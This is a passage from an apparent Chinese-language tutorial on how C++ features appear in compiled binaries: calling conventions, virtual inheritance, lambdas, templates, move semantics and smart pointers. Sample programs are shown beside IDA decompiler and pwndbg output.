.data.rel.ro:0000000000003CF8 ; Base::foo1(void)
.data.rel.ro:0000000000003D00 0C 13 00 00 00 00 00 00 dq offset _ZN4Base4foo2Ev ; Base::foo2(void)
.data.rel.ro:0000000000003D08 44 13 00 00 00 00 00 00 dq offset _ZN4Base4foo3Ev ; Base::foo3(void)
.data.rel.ro:0000000000003D10 7C 13 00 00 00 00 00 00 dq offset _ZN1A4fooaEv ; A::fooa(void)
.data.rel.ro:0000000000003D18 B4 13 00 00 00 00 00 00 dq offset _ZN1A4foobEv ; A::foob(void)
1
2
3
4
5
6
.data.rel.ro:0000000000003CC0 D4 12 00 00 00 00 00 00       off_3CC0 dq offset _ZN4Base4foo1Ev      ; DATA XREF: B::B(void)+18↑o
.data.rel.ro:0000000000003CC0 ; Base::foo1(void)
.data.rel.ro:0000000000003CC8 0C 13 00 00 00 00 00 00 dq offset _ZN4Base4foo2Ev ; Base::foo2(void)
.data.rel.ro:0000000000003CD0 44 13 00 00 00 00 00 00 dq offset _ZN4Base4foo3Ev ; Base::foo3(void)
.data.rel.ro:0000000000003CD8 EC 13 00 00 00 00 00 00 dq offset _ZN1B4fooaEv ; B::fooa(void)
.data.rel.ro:0000000000003CE0 24 14 00 00 00 00 00 00 dq offset _ZN1B4foobEv ; B::foob(void)

调用约定

C/C++ 函数调用约定,主要是对以下两个方面进行了约定:

  • 当参数个数多于一个时,按照什么顺序把参数压入堆栈(参数的入栈顺序)
  • 函数调用后,由谁来把堆栈恢复原状

常见的调用方式有:

  • C 语言:__cdecl __stdcall __fastcall naked __pascal
  • C++ 语言:__cdecl __stdcall __fastcall naked __pascal __thiscall

下面就分别介绍这几种调用方式:

__stdcall:StandardCall 的缩写,是 Win32 API 使用的标准调用方式

  • 使用 PASCAL 宏,WINAPI 宏和 CALLBACK 宏来指定函数的调用方式为 stdcall
1
int _stdcall function(int a, int b); // explicitly requests the stdcall convention
  • 参数从右向左依次压入堆栈
  • 由被调用函数自己来恢复堆栈,称为自动清栈
  • 函数名自动加前导下划线,后面紧跟着一个@,其后紧跟着参数的大小

__cdecl:C Declaration 的缩写,cdecl 调用方式又称为C调用方式,是32位C程序默认的调用方式

1
2
int function(int a, int b) // 不加修饰符就是cdecl
int _cdecl function(int a, int b) // 明确指定用cdecl
  • 参数从右向左依次压入堆栈
  • 由调用者恢复堆栈,称为手动清栈
  • 函数名自动加前导下划线

__fastcall:一种快速调用方式(通过 CPU 寄存器来传递参数);IDA 会把64位程序默认的寄存器传参约定也标注为 __fastcall(下面列出的寄存器顺序对应 Linux x86-64 的 System V ABI)

1
int _fastcall function(int a, int b); // explicitly requests the fastcall convention (keyword needs the leading underscore)
  • 前6个参数分别放入 RDI,RSI,RDX,RCX,R8,R9
  • 其余参数从右向左依次压入堆栈
  • 如果需要用栈传参,则使用手动清栈

__thiscall:唯一一个不能明确指明的函数修饰,因为 thiscall 不是关键字,是C++类成员函数默认的调用约定

  • 由于成员函数调用还有一个 this 指针,因此必须特殊处理
  • this 指针将作为第一个参数传入,其余参数处理和 __cdecl/__fastcall 一样(取决于程序是32位还是64位)

__stdcall 与 __cdecl 的不同之处:

  • stdcall 方式是在函数返回时利用 retn x 指令清除栈中的参数
  • cdecl 方式是函数返回后,由调用函数者修改 esp 的值来清除栈中的参数

多重继承

一个派生类如果只继承一个基类,称作单继承,那么如果继承了多个基类,就称作多继承

1
class C:public A,public B{};

1685892862095

  • 优点:派生类通过多重继承,可以得到多个基类的数据和方法,更大程度的实现了代码复用
  • 缺点:可能会导致某个类被重复构造,可能得到重复的基类数据

案例:多重继承导致重复基类

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
#include<iostream>
using namespace std;

// Diamond-shaped hierarchy with ordinary (non-virtual) inheritance.
// Every constructor and destructor prints its own name so the call order is visible.
class A{
public:
A(int data):ma(data){ cout << "A()" << endl; }
~A(){ cout << "~A()" << endl; }
protected:
int ma;
};
// B derives from A and initializes its A base explicitly.
class B :public A{
public:
B(int data):A(data),mb(data+1) { cout << "B()" << endl; }
~B(){ cout << "~B()" << endl; }
protected:
int mb;
};
// C derives from A independently of B.
class C :public A{
public:
C(int data):A(data),mc(data+2) { cout << "C()" << endl; }
~C(){ cout << "~C()" << endl; }
protected:
int mc;
};
// D derives from both B and C.
class D :public B, public C{
public:
D(int data):B(data),C(data),md(data+3) { cout << "D()" << endl; }
~D(){ cout << "~D()" << endl; }
protected:
int md;
};

// Constructs one D on the heap; it is never deleted, so no destructor output appears.
int main(){
D* a = new D(10);
return 0;
}
1
2
3
4
5
A()
B()
A()
C()
D()
  • A被构造了两次

虚继承

在继承方式前面加上 virtual 关键字就是虚继承

1
class B:virtual public A{};
  • 如果虚继承类拥有派生类,则构造虚基类的任务将会交给派生类完成

案例:虚继承解决重复基类的问题

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
#include<iostream>
using namespace std;

// Same diamond as the previous sample, but B and C inherit from A virtually.
class A{
public:
A(int data):ma(data){ cout << "A()" << endl; }
~A(){ cout << "~A()" << endl; }
protected:
int ma;
};
class B :virtual public A{
public:
B(int data):A(data),mb(data+1) { cout << "B()" << endl; }
~B(){ cout << "~B()" << endl; }
protected:
int mb;
};
class C :virtual public A{
public:
C(int data):A(data),mc(data+2) { cout << "C()" << endl; }
~C(){ cout << "~C()" << endl; }
protected:
int mc;
};
// D names A(data) in its own initializer list in addition to B and C.
class D :public B, public C{
public:
D(int data):A(data),B(data),C(data),md(data+3) { cout << "D()" << endl; }
~D(){ cout << "~D()" << endl; }
protected:
int md;
};

// Constructs one D on the heap; it is never deleted, so no destructor output appears.
int main(){
D* a = new D(10);
return 0;
}
  • PS:由于B虚继承A,因此派生类D需要完成虚基类A的构造
1
2
3
4
A()
B()
C()
D()

案例:虚基类的构造问题

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
#include<iostream>
using namespace std;

// Linear chain A <- B <- C <- D in which only B inherits from A virtually.
class A{
public:
A(int data):ma(data){ cout << "A()" << endl; }
~A(){ cout << "~A()" << endl; }
protected:
int ma;
};
class B :virtual public A{
public:
B(int data):A(data),mb(data+1) { cout << "B()" << endl; }
~B(){ cout << "~B()" << endl; }
protected:
int mb;
};
// C is not a direct child of A, yet it still lists A(data) in its initializer list.
class C :public B{
public:
C(int data):A(data),B(data),mc(data+2) { cout << "C()" << endl; }
~C(){ cout << "~C()" << endl; }
protected:
int mc;
};
// D likewise lists A(data) alongside its direct base C.
class D :public C{
public:
D(int data):A(data),C(data),md(data+3) { cout << "D()" << endl; }
~D(){ cout << "~D()" << endl; }
protected:
int md;
};

// Constructs one D on the heap; it is never deleted, so no destructor output appears.
int main(){
D* a = new D(10);
return 0;
}
  • 由于B虚继承A,因此派生类C、D的构造函数都需要在初始化列表中给出虚基类A的构造
  • 实际构造对象时,虚基类只由最终派生类(most derived class,这里是D)负责构造,中间类对A的初始化会被忽略

虚基类的内存布局:

1
2
3
4
5
00:0000│     0x55555556aea0 ◂— 0x0
01:0008│     0x55555556aea8 ◂— 0x21 /* '!' */
02:0010│ rbx 0x55555556aeb0 —▸ 0x555555557cb8 ◂— 0x555555557cb8
03:0018│     0x55555556aeb8 ◂— 0xc0000000b /* '\x0b' */
04:0020│     0x55555556aec0 ◂— 0xa0000000d /* '\r' */
  • 虚继承的子类都有一个虚基类指针,其指向虚基类表(虚基类指针和虚函数的虚指针不是同一个东西)
  • 虚继承底层实现原理与编译器相关,一般通过虚基类指针和虚基类表实现
1
2
3
4
5
6
7
8
pwndbg> telescope 0x55555556aea0
00:0000│     0x55555556aea0 ◂— 0x0
01:0008│     0x55555556aea8 ◂— 0x31 /* '1' */
02:0010│ rbx 0x55555556aeb0 —▸ 0x555555557c28 ◂— 0x0
03:0018│     0x55555556aeb8 ◂— 0xc0000000b /* '\x0b' */
04:0020│     0x55555556aec0 ◂— 0xd /* '\r' */
05:0028│     0x55555556aec8 —▸ 0x555555557c40 —▸ 0x55555555536c (A::fun()) ◂— endbr64
06:0030│     0x55555556aed0 ◂— 0xa /* '\n' */
  • 这里的 0x555555557c40 就是A类的虚指针,而 0x555555557c28 是D类的虚基类指针

匿名函数 Lambda

lambda 函数是一种匿名函数,它表示一个接受参数并返回一个值的函数

lambda 函数的语法如下:

1
[capture](parameters) -> return_type { function_body }

测试样例:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
#include <stdio.h>

// Function-pointer aliases used to hold captureless lambdas.
typedef int (*lambda_ta)(int);
typedef int (*lambda_tb)(int,int);
typedef double (*lambda_tc)(double); // declared but not used below

// Global lambda stored in a function pointer: returns a * 2.
lambda_ta lambdaA = [](int a) -> int {
return a * 2;
};

// Global lambda stored in a function pointer: returns a * b.
lambda_tb lambdaB = [](int a,int b) -> int {
return a * b;
};

// Calls both global lambdas, then defines and immediately invokes a local one.
int main() {
int x0 = 5;
int x1 = lambdaA(x0);
int x2 = lambdaB(x0,x1);
double y0 = x1 + x2;
double y1 = [](double a) -> double {
return a * 2;
}(y0);

return 0;
}
  • 在底层,局部匿名函数和全局匿名函数的实现不同
1
2
3
4
x0 = 5;
x1 = lambdaA(5);
y0 = (double)(x1 + lambdaB(5, x1));
main::{lambda(double)#1}::operator()(&__closure, y0);
  • 匿名函数和普通函数本质上的区别就是:匿名函数不能通过函数名来调用
  • 调用全局匿名函数其实是调用全局变量上对应的函数指针:
1
2
3
4
5
6
7
8
.data:0000000000004010                               public lambdaA
.data:0000000000004010 ; lambda_ta lambdaA
.data:0000000000004010 1A 12 00 00 00 00 00 00 lambdaA dq offset _ZN7lambdaAMUliE_4_FUNEi
.data:0000000000004010 ; DATA XREF: main+22↑r
.data:0000000000004018 public lambdaB
.data:0000000000004018 ; lambda_tb lambdaB
.data:0000000000004018 55 12 00 00 00 00 00 00 lambdaB dq offset _ZN7lambdaBMUliiE_4_FUNEii
.data:0000000000004018 ; DATA XREF: main+33↑r
  • 而局部匿名函数本质上是对 () 的重载
  • 调用局部匿名函数其实是调用对应的重载函数:
1
2
3
4
5
6
double __cdecl main::{lambda(double)#1}::operator()(
const main::$256B327EE357AF9FCD813216707B60D5 *const __closure,
double a)
{
return a + a; /* PS:编译器对这里进行了优化 */
}

泛型编程

模板是泛型编程的基础,泛型编程即以一种独立于任何特定类型的方式编写代码

模板有两类:函数模板,类模板

函数模板

不规定某个函数的传参类型或者返回值类型

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
#include <iostream>
#include <string>

using namespace std;

// Exchanges the values of the two referenced objects.
// Works for any T that can be copied and assigned.
template <class T>
void Swap(T &num1, T& num2){
    T held(num1);   // keep the first value while it gets overwritten
    num1 = num2;
    num2 = held;
}

// Uses Swap with two different argument types and prints the results.
int main() {
int a = 10, b = 20;
Swap(a,b); /* function template instantiation (T deduced as int) */
cout << "a :" << a << "b :" << b << endl;

float c = 10.55f, d = 3.14f;
Swap(c, d); /* function template instantiation (T deduced as float) */
cout << "c :" << c << "d :" << d << endl;
}
  • 函数模板不规定参数类型,返回值类型
  • 在编译时,编译器会根据实际传参来创建不同类型的副本,这个过程被称为函数模板实例化
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
a = 10;
b = 20;
Swap<int>(&a, &b); /* 函数模板实例化(创建int类型的副本) */
v3 = std::operator<<<std::char_traits<char>>(&std::cout, &unk_2005);
v4 = std::ostream::operator<<(v3, (unsigned int)a);
v5 = std::operator<<<std::char_traits<char>>(v4, &unk_2009);
v6 = std::ostream::operator<<(v5, (unsigned int)b);
std::ostream::operator<<(v6, &std::endl<char,std::char_traits<char>>);
c = 10.55;
d = 3.1400001;
Swap<float>(&c, &d); /* 函数模板实例化(创建float类型的副本) */
v7 = std::operator<<<std::char_traits<char>>(&std::cout, &unk_200D);
v8 = std::ostream::operator<<(v7, *(double *)_mm_cvtsi32_si128(LODWORD(c)).m128i_i64);
v9 = std::operator<<<std::char_traits<char>>(v8, &unk_2011);
v10 = std::ostream::operator<<(v9, *(double *)_mm_cvtsi32_si128(LODWORD(d)).m128i_i64);
std::ostream::operator<<(v10, &std::endl<char,std::char_traits<char>>);

1686123247822

下面是一个特殊的案例:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
#include <iostream>
#include <cassert>
using namespace std;

// Ordinary function: returns a + b.
int add(int a,int b){
return a+b;
}

// Global lambda stored in a function pointer: returns a - b.
typedef int (*lambda_t)(int,int);
lambda_t sub = [](int a,int b) -> int {
return a-b;
};

// Calls fn(10, 5) and prints the result; Fn is whatever callable type the caller passes.
template <typename Fn>
void func(Fn const &fn){
int a = 10;
int b = 5;
cout << fn(a,b) << endl;
}

// Passes three different kinds of callable to the same template.
int main(){
func(add); // ordinary function
func([](int a,int b) -> int {
return a * b;
}); // local lambda
func(sub); // function pointer holding a global lambda
}
  • 函数模板和类模板都可以将 “函数指针” 当做类型
1
2
3
func<int ()(int,int)>((int (*)(int, int))add); /* 普通函数 */
func<main::{lambda(int,int)#1}>(&fn); /* 局部匿名函数 */
func<int (*)(int,int)>(&sub); /* 全局匿名函数 */

类模板

不规定该类中某个函数的传参类型或返回值类型

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
#include <iostream>
#include <string>
#include <cassert>

namespace mzt {
// Minimal growable array used to illustrate class templates.
// Capacity starts at 4 slots and doubles whenever the buffer is full.
// NOTE: the sample still defines no destructor or copy control, so the final
// buffer is not released when a vector goes out of scope.
template<class T>
class vector {
public:
    vector() : _a(nullptr),_size(0),_capacity(0){}

    // Appends a copy of data, growing the buffer first when it is full.
    void push_back(const T& data) {
        if (_capacity == _size) {
            size_t newcapacity = _capacity == 0 ? 4 : _capacity * 2;
            T* tmp = new T[newcapacity];
            assert(tmp);
            // Carry the existing elements over. The previous version switched
            // to the new buffer without copying, losing every stored element
            // on growth.
            for (size_t i = 0; i < _size; ++i) {
                tmp[i] = _a[i];
            }
            // Release the old buffer, which was previously leaked.
            // delete[] on a null pointer is a no-op, so the first growth is safe.
            delete[] _a;
            _a = tmp;
            _capacity = newcapacity;
        }
        _a[_size++] = data;
    }

    // Returns a reference to the element at pos; asserts that pos is in range.
    T& operator[](size_t pos) {
        assert(pos < _size);
        return _a[pos];
    }

    // Returns the number of stored elements.
    size_t getsize() {
        return _size;
    }
private:
    T* _a;              // heap buffer holding _capacity slots
    size_t _size;       // number of slots in use
    size_t _capacity;   // number of slots allocated
};
}

using namespace std;

// Instantiates the class template for two element types and appends two values to each.
int main() {
mzt::vector<int> a; /* class template instantiation with T = int */
a.push_back(1);
a.push_back(2);
mzt::vector<double> b; /* class template instantiation with T = double */
b.push_back(3.0);
b.push_back(4.0);
}
  • 类模板实例化与函数模板实例化不同
  • 类模板实例化需要在类模板名字后跟 <> 指定类型(函数模板实例化也可以用 <> 指定类型,即使没有,编译器也会自动识别类型)
1
2
3
4
5
6
7
8
9
10
mzt::vector<int>::vector(&a); /* 类模板实例化 */
LODWORD(b._a) = 1;
mzt::vector<int>::push_back(&a, (const int *)&b);
LODWORD(b._a) = 2;
mzt::vector<int>::push_back(&a, (const int *)&b);
mzt::vector<double>::vector(&b); /* 类模板实例化 */
data = 3.0;
mzt::vector<double>::push_back(&b, &data);
data = 4.0;
mzt::vector<double>::push_back(&b, &data);

模板特例化

在原模板类的基础上,针对特殊类型所进行特殊化的实现方式

模板特化中分为:函数模板特化,类模板特化

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
#include <iostream>
#include <cstring>

using namespace std;

// Ordinary (non-template) overload for two ints.
bool IsEqual(int left, int right) {
return left == right;
}

// Primary template: compares any two values of the same type with ==.
template<class T>
bool IsEqual(const T& left, const T& right) {
return left == right;
}

// Explicit specialization for const char*: compares string contents with strcmp
// instead of comparing the pointer values.
template< >
bool IsEqual<const char *>(const char* const& left,
const char* const& right) {
return strcmp(left, right) == 0;
}

// Makes one call of each form: plain, explicit <int>, explicit <const char*>.
int main(){
int a = 0;
int b = 1;
const char* p1 = "hello";
const char* p2 = "hello";
bool ret;

ret = IsEqual(a, b);
ret = IsEqual<int>(a, b);
ret = IsEqual<const char*>(p1, p2);
}
1
2
3
4
5
6
7
v4 = 0;
v5 = 1;
v6 = "hello";
v7[0] = "hello";
IsEqual(0, 1); /* 调用普通函数(最优先) */
IsEqual<int>(&v4, &v5); /* 调用模板函数 */
IsEqual<char const*>(&v6, v7); /* 调用特例化的模板函数(次优先) */
  • 如果遇到相同普通函数(函数名和类型都相同),编译器则会优先调用普通函数(最优先)
  • 如果指定类型匹配,特例化的模板函数会比普通的模板函数优先调用(次优先)

类型形参 & 非类型形参

模板参数分类:类型形参、非类型形参

  • 类型形参:出现在模板参数列表中,跟在 class 或者 typename 之后的参数类型名称
  • 非类型形参:就是用一个常量作为类(函数)模板的一个参数,在类(函数)模板中可将该参数当成常量来使用
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
#include <iostream>
#include <cassert>

namespace mzt {
    /*
     * Fixed-size array wrapper.
     *   T - element type (type template parameter, defaults to int)
     *   N - number of elements (non-type template parameter, defaults to 10)
     */
    template<class T = int, size_t N = 10>
    class Array {
    public:
        /* Returns a reference to element pos; pos must be less than N. */
        T& operator[](size_t pos) {
            assert(pos < N); /* an out-of-range index would access memory outside arr */
            return arr[pos];
        }
        /* Read-only element access for const Array objects; same bounds rule. */
        const T& operator[](size_t pos) const {
            assert(pos < N);
            return arr[pos];
        }
    private:
        T arr[N];
    };
}

/* Demo: uses mzt::Array with both template parameters left at their defaults. */
int main(){
mzt::Array< > a; /* no template arguments supplied, so the defaults are used */
a[0]=1;
a[1]=2;
return 0;
}
1
2
*mzt::Array<int,10ul>::operator[](&a, 0LL) = 1;
*mzt::Array<int,10ul>::operator[](&a, 1uLL) = 2;

右值引用

左值 & 右值

  • 左值是可以放在赋值号左边可以被赋值的值,左值必须要在内存中有实体
    • 当左值被赋值时,左值本身保留
  • 右值是出现在赋值号右边、其值被取出后赋给其他变量的值,右值可以位于内存中,也可以位于 CPU 寄存器中
    • 当右值被赋值时,右值会被释放
1
2
3
4
5
6
7
8
9
10
11
12
13
#include <iostream>
#include <memory>
using namespace std;

/* Demo: prints the address and the value reached through a variable, an lvalue reference and an rvalue reference. */
int main(){
int a = 10;
int &b = a; /* lvalue reference (b is an alias for a) */
int &&c = 20; /* rvalue reference (c is an alias for the value 20) */

cout << &a << ":" << a << endl;
cout << &b << ":" << b << endl;
cout << &c << ":" << c << endl;
}
1
2
3
0x7ffc2d216c30:10
0x7ffc2d216c30:10
0x7ffc2d216c34:20

IDA 分析:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
v13 = 10; /* int a = 10 */
v15 = &v13; /* int &b = a */
v14 = 20; /* int &&c = 20 */
v16 = &v14;
v3 = std::ostream::operator<<(&std::cout, &v13);
v4 = std::operator<<<std::char_traits<char>>(v3, ":");
v5 = std::ostream::operator<<(v4, v13);
std::ostream::operator<<(v5, &std::endl<char,std::char_traits<char>>);
v6 = std::ostream::operator<<(&std::cout, v15);
v7 = std::operator<<<std::char_traits<char>>(v6, ":");
v8 = std::ostream::operator<<(v7, *v15);
std::ostream::operator<<(v8, &std::endl<char,std::char_traits<char>>);
v9 = std::ostream::operator<<(&std::cout, v16);
v10 = std::operator<<<std::char_traits<char>>(v9, ":");
v11 = std::ostream::operator<<(v10, *v16);
std::ostream::operator<<(v11, &std::endl<char,std::char_traits<char>>);
  • 在底层,右值引用相当于是赋值与左值引用的结合

std::move

std::move 唯一的功能是将一个左值强制转化为右值引用

1
2
3
4
/*
 * Library implementation of move as quoted by the article.
 * Casts _Arg to an rvalue reference of its reference-stripped type and returns it;
 * no other work is done.
 * NOTE(review): _CONST_FUN and _NOEXCEPT are macros defined outside this excerpt —
 * presumably they expand to constexpr / noexcept; confirm against the library headers.
 */
template <class _Ty>
inline _CONST_FUN typename remove_reference<_Ty>::type&& move(_Ty&& _Arg) _NOEXCEPT {
return (static_cast<typename remove_reference<_Ty>::type&&>(_Arg));
}
  • 如果是左值,就通过 static_cast 将传进来的参数强转为右值并返回
  • 如果是右值,直接返回
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
#include <iostream>
#include <utility>
#include <vector>
#include <string>
using namespace std;

/* Demo: contrasts assigning a std::string from an lvalue with assigning it from std::move(s). */
int main(){
std::string s = "Hello";
std::string sleft;
std::string sright;

sleft = s; /* assignment from an lvalue */
std::cout << s << endl;
std::cout << sleft << endl;
sright = std::move(s); /* assignment from an rvalue */
std::cout << s << endl; /* the sample output in the article shows an empty line here */
std::cout << sright << endl;
}
1
2
3
4
Hello
Hello

Hello
  • 左值赋值:字符串 s 仍然存在
  • 右值赋值:字符串 s 被置空

IDA 分析:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
std::allocator<char>::allocator(&v9, argv, envp);
std::string::basic_string<std::allocator<char>>(v10, "Hello", &v9);
std::allocator<char>::~allocator(&v9);
std::string::basic_string(v11);
std::string::basic_string(v12);
std::string::operator=(v11, v10);
v3 = std::operator<<<char>(&std::cout, v10);
std::ostream::operator<<(v3, &std::endl<char,std::char_traits<char>>);
v4 = std::operator<<<char>(&std::cout, v11);
std::ostream::operator<<(v4, &std::endl<char,std::char_traits<char>>);
v5 = std::move<std::string &>(v10);
std::string::operator=(v12, v5);
v6 = std::operator<<<char>(&std::cout, v10);
std::ostream::operator<<(v6, &std::endl<char,std::char_traits<char>>);
v7 = std::operator<<<char>(&std::cout, v12);
std::ostream::operator<<(v7, &std::endl<char,std::char_traits<char>>);
std::string::~string(v12);
std::string::~string(v11);
std::string::~string(v10)
  • std::move 在底层会直接返回参数的原始值,真正置空字符串 s 的操作是 std::string::operator=() 函数
1
2
3
4
__int64 __fastcall std::move<std::string &>(__int64 a1)
{
return a1;
}
  • 仔细分析可以发现左值赋值和右值赋值调用的 std::string::operator=() 函数不一样
1
2
.text:0000000000002509 E8 E2 FC FF FF                call    __ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEaSERKS4_ ; std::string::operator=(std::string const&)
.text:0000000000002509
1
2
.text:0000000000002577 E8 84 FD FF FF                call    __ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEaSEOS4_ ; std::string::operator=(std::string&&)
.text:0000000000002577

拷贝构造函数 & 移动构造函数

如果想用其它对象初始化一个同类的新对象,只能借助类中的拷贝构造函数

  • 其实现原理是为新对象复制一份和其它对象一模一样的数据
  • 当类中拥有指针类型的成员变量时,拷贝构造函数中需要以深拷贝的方式复制该指针成员

移动构造函数使用右值引用形式的参数

  • 在此构造函数中,num 指针变量采用的是浅拷贝的复制方式
  • 在函数内部置空了 d.num(为了避免 “同一块堆空间被释放多次”)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
#include <iostream>
using namespace std;

/*
 * Owns one heap-allocated int through the raw pointer num and logs every
 * special member function call to stdout.
 * num is null only for an object that has been moved from (or copied from
 * such an object).
 */
class demo{
public:
    /* Default constructor: allocates the int and initializes it to 1. */
    demo():num(new int(1)){
        cout<<"construct!"<<endl;
    }
    /*
     * Copy constructor (deep copy): allocates a separate int holding the
     * same value. A moved-from source has a null num, which is copied as
     * null instead of being dereferenced.
     */
    demo(const demo &d):num(d.num ? new int(*d.num) : nullptr){
        cout<<"copy construct!"<<endl;
    }
    /*
     * Move constructor (shallow copy): takes over d's allocation and nulls
     * d.num so the same memory is not released twice.
     */
    demo(demo &&d):num(d.num){
        d.num = nullptr;
        cout<<"move construct!"<<endl;
    }
    /* Destructor: releases the owned int; deleting a null pointer is a no-op. */
    ~demo(){
        delete num;
        cout<<"class destruct!"<<endl;
    }
    int *num;
};

/* Factory helper: returns a default-constructed demo by value. */
demo get_demo(){
return demo();
}

/* Demo: creates one demo from the factory, one by copying it and one by moving from it. */
int main(){
demo a = get_demo();
demo b = a; /* a is an lvalue: the copy constructor runs */
demo c = move(a); /* move(a) is an rvalue: the move constructor runs */
return 0;
}

IDA 分析:

1
2
3
4
5
6
7
get_demo((demo *)v5);
demo::demo((demo *)v6, (const demo *)v5); /* 拷贝构造 */
v3 = std::move<demo &>(v5);
demo::demo(v7, v3); /* 移动构造 */
demo::~demo((demo *)v7);
demo::~demo((demo *)v6);
demo::~demo((demo *)v5);
1
2
3
4
5
6
7
8
9
10
11
void __fastcall demo::demo(demo *this, const demo *a2)
{
_DWORD *v2; // rax
__int64 v3; // rax

v2 = (_DWORD *)operator new(4uLL);
*v2 = **(_DWORD **)a2;
*(_QWORD *)this = v2;
v3 = std::operator<<<std::char_traits<char>>(&std::cout, "copy construct!");
std::ostream::operator<<(v3, &std::endl<char,std::char_traits<char>>);
}
1
2
3
4
5
6
7
8
9
__int64 __fastcall demo::demo(_QWORD *a1, _QWORD *a2)
{
__int64 v2; // rax

*a1 = *a2;
*a2 = 0LL;
v2 = std::operator<<<std::char_traits<char>>(&std::cout, "move construct!");
return std::ostream::operator<<(v2, &std::endl<char,std::char_traits<char>>);
}

智能指针

智能指针 (Smart Pointer) 是一种在 C++ 中用于管理动态分配的内存的类,它提供了一种灵活的方式来管理对象的生命周期,可以避免资源泄漏和内存错误

auto_ptr

当对象过期时,其析构函数将自动使用 delete 来释放内存:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
#include <iostream>
#include <memory>
using namespace std;

/* Small traced class: announces its construction and destruction on stdout. */
class Auto {
public:
    /* Sets key1 to 10 and key2 to 20, then logs the creation. */
    Auto() : key1(10), key2(20) {
        cout << "Auto create" << endl;
    }
    /* Logs the destruction. */
    ~Auto() {
        cout << "Auto delete" << endl;
    }
    int key1;
    int key2;
};

/* Demo: lets an auto_ptr own a heap-allocated Auto and reads its fields through the pointer operators. */
/* NOTE(review): std::auto_ptr was deprecated in C++11 and removed in C++17 — confirm the sample is built with an older -std setting. */
int main(){
auto_ptr<Auto> test(new Auto);
int key1 = (*test).key1; /* field access through operator* */
int key2 = test->key2; /* field access through operator-> */
int key3 = key1 + key2;
cout << key3 << endl;
return 0;
}
  • 栈上的对象会在当前语句块结束时释放,堆上的对象需要使用 delete 释放
  • auto_ptr 属于栈上的对象,在它的析构函数中会尝试 delete 目标对象

IDA 分析如下:

1
2
3
4
5
6
7
8
v5 = (Auto *)operator new(8uLL);
Auto::Auto(v5); /* Auto的构造函数 */
std::auto_ptr<Auto>::auto_ptr(v8, v5); /* auto_ptr的构造函数 */
v6 = *(_DWORD *)std::auto_ptr<Auto>::operator*(v8);
v7 = v6 + *(_DWORD *)(std::auto_ptr<Auto>::operator->(v8) + 4);
v3 = std::ostream::operator<<(&std::cout, v7);
std::ostream::operator<<(v3, &std::endl<char,std::char_traits<char>>);
std::auto_ptr<Auto>::~auto_ptr(v8); /* auto_ptr的析构函数 */
  • auto_ptr 的析构函数中会自动释放 Auto(传入对象):
1
2
3
4
5
6
7
8
9
10
11
void __fastcall std::auto_ptr<Auto>::~auto_ptr(Auto **a1)
{
Auto *v1; // rbx

v1 = *a1;
if ( *a1 )
{
Auto::~Auto(*a1);
operator delete(v1, 8uLL);
}
}
  • auto_ptr 创建的对象仍然具有指针的性质,其原因是 auto_ptr 对 *、-> 等运算符进行了重载
1
2
3
4
__int64 __fastcall std::auto_ptr<Auto>::operator*(__int64 a1)
{
return *(_QWORD *)a1;
}
1
2
3
4
__int64 __fastcall std::auto_ptr<Auto>::operator->(__int64 a1)
{
return *(_QWORD *)a1;
}
  • PS:对 * 和 -> 的重载只是实现了解引用而已,不负责具体的偏移

unique_ptr

unique_ptr 和 auto_ptr 的用法几乎一样,另外添加了如下几个特性:

  • 基于排他所有权模式:两个指针不能指向同一个资源
  • 无法用左值 unique_ptr 进行复制构造,也无法进行复制赋值,但允许用临时右值(或 std::move 的结果)进行移动构造和移动赋值
  • 在 STL 容器中使用 unique_ptr,不允许直接赋值
  • 支持对象数组的内存管理
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
#include <iostream>
#include <memory>
using namespace std;

/* Demo: shows that unique_ptr ownership can only be transferred by moving, and prints the held addresses before and after. */
int main(){
unique_ptr<string> p1(new string("11111111"));
unique_ptr<string> p2(new string("22222222"));

//p1 = p2; // copy assignment from an lvalue is not allowed
//unique_ptr<string> p3(p2); // copy construction from an lvalue is not allowed

cout << "p1:" << p1.get() << endl;
cout << "p2:" << p2.get() << endl;

unique_ptr<string> p3(std::move(p2));
p2 = std::move(p1); // move turns the lvalue into an rvalue so the assignment is accepted; the effect matches auto_ptr assignment

cout << "-------------------" << endl;
cout << "p1:" << p1.get() << endl;
cout << "p2:" << p2.get() << endl;
cout << "p3:" << p3.get() << endl;
}
1
2
3
4
5
6
p1:0x559625bfdeb0
p2:0x559625bfdee0
-------------------
p1:0
p2:0x559625bfdeb0
p3:0x559625bfdee0

IDA 分析如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
 std::allocator<char>::allocator(v27, argv, envp);
v23 = (void *)operator new(0x20uLL);
std::string::basic_string<std::allocator<char>>(v23, "11111111", v27);
std::unique_ptr<std::string>::unique_ptr<std::default_delete<std::string>,void>(v25, v23); /* unique_ptr的构造函数 */
std::allocator<char>::~allocator(v27);
std::allocator<char>::allocator(v27, v23, v3);
